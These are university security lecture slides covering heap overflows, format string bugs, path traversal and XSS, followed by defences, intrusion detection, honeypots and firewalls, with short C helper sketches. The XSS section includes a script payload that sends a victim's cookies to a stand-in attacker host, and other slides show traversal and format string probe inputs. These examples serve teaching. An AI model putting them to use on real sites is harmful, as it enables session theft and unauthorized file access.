CMSC 414
Computer and Network Security
Lecture 25
Jonathan Katz

Heap overflows
• The heap is dynamically allocated memory
  – E.g., created using malloc
• Cannot overwrite the return address (as on the stack), but can still cause havoc, e.g.:
    static char buf[16], *filename;
    filename = "file.txt";
    …
    f = fopen(filename, "w+");
• Overflowing buf could change the address to which filename points

Heap overflows
• Can also exploit heap overflows to affect function pointers
  – Again, possibly change the address to which the function pointer points
  – Can potentially cause execution of arbitrary code!

Format string vulnerabilities
• What is the difference between printf(buf); and printf("%s", buf); ?
• What if buf holds %x ?
• Look at memory, and what printf expects…

What happens?
• printf("%x") expects an additional argument…
[Figure: stack layout showing "%x", ebp, ret addr, buf, the frame of the calling function, and args, with the annotation "Will print the value sitting here"]
• What if we could write that value instead?
  – See “Blended attacks…”

Other input validation bugs
• Say a program reads from a user-specified file
• Program running in directory /secure, but only allows access to files in /secure/pub
  – Checks that the filename supplied by the user begins with /pub
• What if the user supplies the filename "/pub/../top_secret" ?

XSS attacks
• Another input validation flaw
• Say we have a script that echoes a user’s name:
    GET /welcome.cgi?name=Joe HTTP/1.0
• Response is:
    <html><title> Welcome! </title> Hi Joe </html>
• What if the user supplies the following “name”:
    <script>alert(document.cookie)</script>

XSS attacks
• If an attacker can cause an honest user to click on a specially crafted URL, the user’s cookies can be sent to the attacker:
    http://victim.com/welcome.cgi?name=<script>window.open("http://badguy.com?cookie=" + document.cookie)</script>
• How would an attacker do this?
  – Phishing
  – Link from their webpage
  – Link to a fake movie, picture, etc.
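
One common mitigation for the welcome.cgi example is to escape the user-supplied name before echoing it into the page. The following is a minimal sketch, assuming the script is written in C; html_escape is a hypothetical helper, not something from the lecture, and it only covers the case where the name is placed in ordinary HTML text (not inside attributes, scripts, or URLs).

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Hypothetical helper (not from the lecture): copy `in` to `out`,
 * replacing characters that are special in HTML with entities.
 * `cap` is the capacity of `out`, including the terminating NUL.
 * Returns 0 on success, -1 if `out` is too small. */
int html_escape(const char *in, char *out, size_t cap)
{
    assert(in != NULL && out != NULL);
    if (cap == 0)
        return -1;

    size_t used = 0;
    for (; *in != '\0'; in++) {
        char single[2] = { *in, '\0' };   /* default: copy the byte as-is */
        const char *rep;
        switch (*in) {
        case '&':  rep = "&amp;";  break;
        case '<':  rep = "&lt;";   break;
        case '>':  rep = "&gt;";   break;
        case '"':  rep = "&quot;"; break;
        case '\'': rep = "&#39;";  break;
        default:   rep = single;   break;
        }
        size_t n = strlen(rep);
        if (used + n + 1 > cap)
            return -1;                    /* refuse to truncate silently */
        memcpy(out + used, rep, n);
        used += n;
    }
    out[used] = '\0';
    return 0;
}
```

With this helper, the name <script>alert(document.cookie)</script> would be echoed as &lt;script&gt;alert(document.cookie)&lt;/script&gt;, which a browser displays as text rather than running as a script.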
XSS attacks
• XSS attacks are a potential problem any time user-submitted content is used to generate HTML
• Need to perform extensive validation of user-supplied data
• Simple fixes (like rejecting strings that contain "<script>") can be circumvented
• Preventing XSS attacks in general is very hard (impossible(?) if certain functionality is desired)

Defenses (briefly!)
• Secure programming techniques
• Penetration testing
• Static analysis
• Dynamic analysis
• Prevention techniques

Secure programming techniques
• Validate all input
• Avoid buffer overflows (off-by-one, unsafe string manipulation functions, …)
• Intelligent help/error messages

Validating input
• Determine acceptable input and check for a match; don’t just check against a list of “non-matches”
  – Limit maximum length
  – Watch out for special characters, escape chars.
• Check bounds on integer values
  – Check for negative inputs

Validating input
• Filenames
  – Disallow *, .., etc.
• HTML, URLs, cookies
  – Cf. cross-site scripting attacks
• Command-line arguments
  – Even argv[0]…
• Don’t use printf(userInput)
  – Use printf("%s", userInput) instead…

Avoiding buffer overflows
• Use arrays instead of pointers
• Avoid strcpy(), strcat(), etc.
  – Use strncpy(), strncat() instead
  – Even these are not perfect… (e.g., strncpy() may leave the result without null termination)
• Make buffers (slightly) longer than necessary to avoid “off-by-one” errors

Error messages
• Minimize feedback
  – Don’t (over)explain failures to untrusted users
  – Don’t release version numbers…
  – Don’t offer “too much” help (suggested filenames, etc.)

Static/dynamic analysis
• Static analysis: run on the source code prior to deployment; can check for known flaws
  – E.g., flawfinder, cqual
• Dynamic analysis: try to catch (potential) buffer overflows during program execution
• Comparison?
  – Static analysis very useful, but not perfect
  – Dynamic analysis can be better (in tandem with static analysis), but can slow down execution

Dynamic analysis: Libsafe
• Intercepts all calls to, e.g., strcpy(dest, src)
  – Validates sufficient space in current stack frame: |frame-pointer - dest| > strlen(src)
  – If so, executes strcpy; otherwise, terminates application

Preventing buffer overflows
• Basic stack exploit can be prevented by marking stack segment as non-executable, or randomizing stack location
• Problems:
  – Does not defend against “return-to-libc” exploit
    • Overflow sets ret-addr to address of libc function
  – Some apps need executable stack (e.g., LISP interpreters)
  – Does not block more general exploits, like heap overflow

StackGuard
• Embed random “canaries” in stack frames and verify their integrity prior to function return
• This is actually used!
  – Helpful, but not foolproof…
[Figure: two stack frames, Frame 2 and Frame 1, each laid out as local, canary, sfp, ret, str]

More methods…
• Address obfuscation
  – Encrypt return address on stack by XORing with random string. Decrypt just before returning from function
  – Attacker needs decryption key to set return address to desired value

Intrusion detection

Prevention vs. detection
• Firewalls (and other security mechanisms) aim to prevent intrusion
• IDS aims to detect intrusion in case it occurs
• Use both in tandem!
  – Defense in depth
  – Full prevention impossible
  – The sooner intrusion is detected, the less the damage
  – IDS can also be a deterrent, and can be used to detect weaknesses in other security mechanisms

IDS overview
• Goals of IDS
  – Detection and response
  – Deterrence
  – Recovery
  – Defense against future attacks
• Two classes of behavior to be detected
  – Illegal access by outsiders
  – Illegal access by insiders

IDS tradeoff
• IDS based on the assumption that attacker behavior is (sufficiently) different from legitimate user behavior
• In reality, there will be overlap
  – Some legitimate behavior may appear malicious
  – Intruder can attempt to disguise their behavior as that of an honest user

False positives/negatives
• False positive
  – Alarm triggered by acceptable behavior
• False negative
  – No alarm triggered by illegal behavior
• Always a tradeoff between the two…
  – Note: credit card companies face the same tradeoff

[Figure: probability density functions over a measurable behaviour parameter, showing the profile of intruder behaviour and the profile of authorized user behaviour, the average behaviour of each, and the overlap in observed or expected behaviour]

False alarms?
• Say we have an IDS that is 99% accurate
  – I.e., Pr[alarm | attack] = 0.99 and Pr[no alarm | no attack] = 0.99
• An alarm goes off: what is the probability that an attack is taking place?
• To increase this probability, what should we focus on improving?

False alarms
• Say the probability of an attack is 1/1000
• Use Bayes’ law:
    Pr[attack | alarm] = Pr[alarm | attack] Pr[attack] / Pr[alarm]
                       = 0.99 * 0.001 / (0.99 * 0.001 + 0.01 * 0.999)
                       ≈ 0.09
• I.e., when an alarm goes off, roughly 90% of the time it will be a false alarm!
• How best to lower this number?
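
To experiment with the question above, the Bayes' law calculation can be wrapped in a small function. This is a minimal sketch; the name posterior_attack and its parameter names are chosen here for illustration and do not come from the lecture.

```c
#include <assert.h>

/* Pr[attack | alarm] by Bayes' law.
 *   detect_rate      = Pr[alarm | attack]
 *   false_alarm_rate = Pr[alarm | no attack]
 *   prior            = Pr[attack]
 * Returns 0.0 if an alarm can never occur under the given rates. */
double posterior_attack(double detect_rate, double false_alarm_rate,
                        double prior)
{
    assert(prior >= 0.0 && prior <= 1.0);

    /* Total probability of an alarm, from attacks and from non-attacks. */
    double p_alarm = detect_rate * prior
                   + false_alarm_rate * (1.0 - prior);

    return p_alarm > 0.0 ? detect_rate * prior / p_alarm : 0.0;
}
```

With the numbers from the slide, posterior_attack(0.99, 0.01, 0.001) is about 0.090. Raising the detection rate to 0.999 barely changes the result (about 0.091), while lowering the false alarm rate to 0.001 raises it to about 0.498. When attacks are rare, the false positive rate dominates.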
Host-based IDS
• Monitors events on a single host
• Can detect both internal and external intrusions
• Two general approaches
  – Anomaly detection
  – Signature (rule-based) detection

Anomaly detection
• Monitor behavior and compare to some “baseline” behavior using statistical tests
  – Look for deviations from “normal behavior”
• “Normal behavior” can be defined on a global level or a per-user level
• “Normal behavior” can be specified by a human, or learned automatically over time

Anomaly detection
• Threshold detection
  – Looking at frequency of occurrence of various events, within a specific period of time
  – Even if attacker can thwart this, it will slow the attack
• Profile-based (statistical anomaly detection)
  – Look at changes from a user-specific “baseline”
  – Baseline behavior can be derived from audit records
  – Can look at outliers from the mean, or more complicated (multivariate) data; in either case, need to define some appropriate metric for when unusual behavior is detected

Metric | Model | Type of intrusion detected
Login frequency by date and time | Mean and standard deviation | Intruders are more likely to log in during off-hours
Frequency of login at different locations | Mean and standard deviation | Intruders may log in from a location that a legitimate user does not
Time since last login | Markov (time series) | Break-in to unused account
Length of session | Mean and standard deviation | Masquerader may run a much shorter or longer session
Large amount of data copied to some location | Mean and standard deviation | Detect attempt to copy large amounts of sensitive data
Password failures at login | Unusual event/operational | Detect attempt to guess passwords

Signature (rule-based) detection
• Define a set of “bad patterns” (e.g., known exploits or known bad events)
• Detect these patterns if they occur
• Anomaly detection ≈ looks for atypical behavior
• Signature detection ≈ looks for improper behavior

Example rules
• Users should not read files in other users’ personal directories
• Users must not write
  to other users’ files
• Users who log in after hours often use the same files they used earlier
• Users do not generally open disk devices directly, but rely on higher-level OS utilities
• Users should not be logged in more than once to the same system
• Users do not make copies of system programs

Distributed host-based IDS
• Combine information collected at many different hosts in the network
• One or more machines in the network will collect and analyze the network data
  – Audit records need to be sent over the network
  – Confidentiality and integrity of the data must be preserved
  – Centralized architecture: single point of data collection/analysis
  – Decentralized architecture: more than one analysis center; more robust, but must be coordinated

Network-based IDS
• Monitors traffic at selected points on the network
  – Real time; packet-by-packet
• Host-based IDS: looks at user behavior, activity on host, local view
• Network-based IDS: looks at network traffic, global view

Sensor types
• Inline sensor
  – Inserted in network path; all traffic passes through the sensor
• Passive sensor
  – Monitors a copy of network traffic
• Passive sensor more efficient; inline sensor can block attacks immediately

Sensor placement
• Inside firewall?
  – Can detect attacks that penetrate firewall
  – Can detect firewall misconfiguration
  – Can examine outgoing traffic more easily to detect insider attacks
  – Can configure based on network resources being accessed (e.g., configure differently for traffic directed to web server)
• Outside firewall?
  – Can document attacks (types/locations/number) even if prevented by firewall (can then be handled out-of-band)

Honeypots
• Decoy systems to lure potential attackers
  – Divert attackers from critical systems
  – Collect information about attacker’s activity
  – Delay attacker long enough to respond
• Since honeypot is not legitimate, any access to the honeypot is suspicious
• Can have honeypot computers, or even honeypot networks

Honeypot placement
• Outside firewall
  – Can detect attempted connections to unused IP addresses, port scanning
  – No risk of compromised system behind firewall
  – Does not divert internal attackers
• Fully internal honeypot
  – Catches internal attacks
  – Can detect firewall misconfigurations/vulnerabilities
  – If compromised, there is a compromised system behind the firewall

Firewalls

Firewalls: overview
• Provide central “choke point” for all traffic entering and exiting the system
• Main goals
  – Service control: what services can be accessed (inbound or outbound)
  – Behavior control: how services are accessed (e.g., spam filtering, web content filtering)
  – User/machine control: controls access to services on a per-user/machine level

Firewalls: overview
• Other goals
  – Auditing (see also intrusion detection)
  – Network address translation
  – Can also run security functionality, e.g., IPSec, VPN
• What they cannot protect against
  – Do not offer full protection against insider attacks
  – Users bypassing the firewall to connect to the Internet
  – Infected devices connecting to network internally

Firewalls: overview
• Positive filter
  – Allow only traffic meeting certain criteria
  – I.e., the default is to reject
• Negative filter
  – Reject traffic meeting certain criteria
  – I.e., the default is to accept

Need for firewalls?
• Why not just provision each computer with its own firewall/IDS?
  – Not cost effective
  – Different OSs make management difficult
  – Patches must be propagated to all machines in the system
  – Does not protect against insider attacks that extend beyond the local network
• Defense in depth

Packet filtering
• Apply a set of rules to each incoming/outgoing packet
• Packet filtering may be based on any part(s) of the traffic header(s), e.g.:
  – Source/destination IP address
  – Port numbers
  – Flags
  – Network interface (e.g., reject packet with internal IP address if coming from the wrong interface)

Disadvantages of packet filtering
• Can be difficult to configure rules to achieve both usability and security
  – E.g., FTP uses a dynamically assigned port number for the data transfer
• Misconfigurations can be easily exploited
• Does not examine application-level data
• No user authentication
• Does not address inherent TCP/IP vulnerabilities
  – E.g., address spoofing

Stateful firewalls
• Typical packet filtering applied on a packet-by-packet basis
• Can also look at context
  – E.g., maintain list of active TCP connections (useful when port numbers are dynamically assigned)
  – E.g., look at sequence numbers and detect replays
• Can also use global information (e.g., number of packets to/from a particular IP address)
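
The "list of active TCP connections" idea can be illustrated with a toy connection table. This is only a sketch under simplifying assumptions: the struct and function names are hypothetical, entries never expire, and TCP flags and sequence numbers are ignored, all of which a real stateful firewall would need to handle.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

#define MAX_CONNS 64   /* arbitrary capacity for this sketch */

/* One tracked connection, identified by its two endpoints. */
struct conn {
    uint32_t in_ip;    /* internal host address */
    uint16_t in_port;  /* internal (possibly dynamically assigned) port */
    uint32_t ext_ip;   /* external host address */
    uint16_t ext_port; /* external port */
};

struct conn_table {
    struct conn entries[MAX_CONNS];
    size_t count;
};

/* Record a connection opened from the inside.
 * Returns false if the table is full. */
bool note_outbound(struct conn_table *t, uint32_t in_ip, uint16_t in_port,
                   uint32_t ext_ip, uint16_t ext_port)
{
    assert(t != NULL);
    if (t->count >= MAX_CONNS)
        return false;
    t->entries[t->count++] = (struct conn){
        .in_ip = in_ip, .in_port = in_port,
        .ext_ip = ext_ip, .ext_port = ext_port,
    };
    return true;
}

/* Positive filter: accept an inbound packet only if it belongs to a
 * connection recorded earlier; the default is to reject. */
bool allow_inbound(const struct conn_table *t, uint32_t ext_ip,
                   uint16_t ext_port, uint32_t in_ip, uint16_t in_port)
{
    assert(t != NULL);
    for (size_t i = 0; i < t->count; i++) {
        const struct conn *c = &t->entries[i];
        if (c->ext_ip == ext_ip && c->ext_port == ext_port &&
            c->in_ip == in_ip && c->in_port == in_port)
            return true;
    }
    return false;
}
```

Because replies are matched against recorded connections, the rule set does not need to open a whole range of high-numbered ports in advance, which is the case the slide describes as useful when port numbers are dynamically assigned.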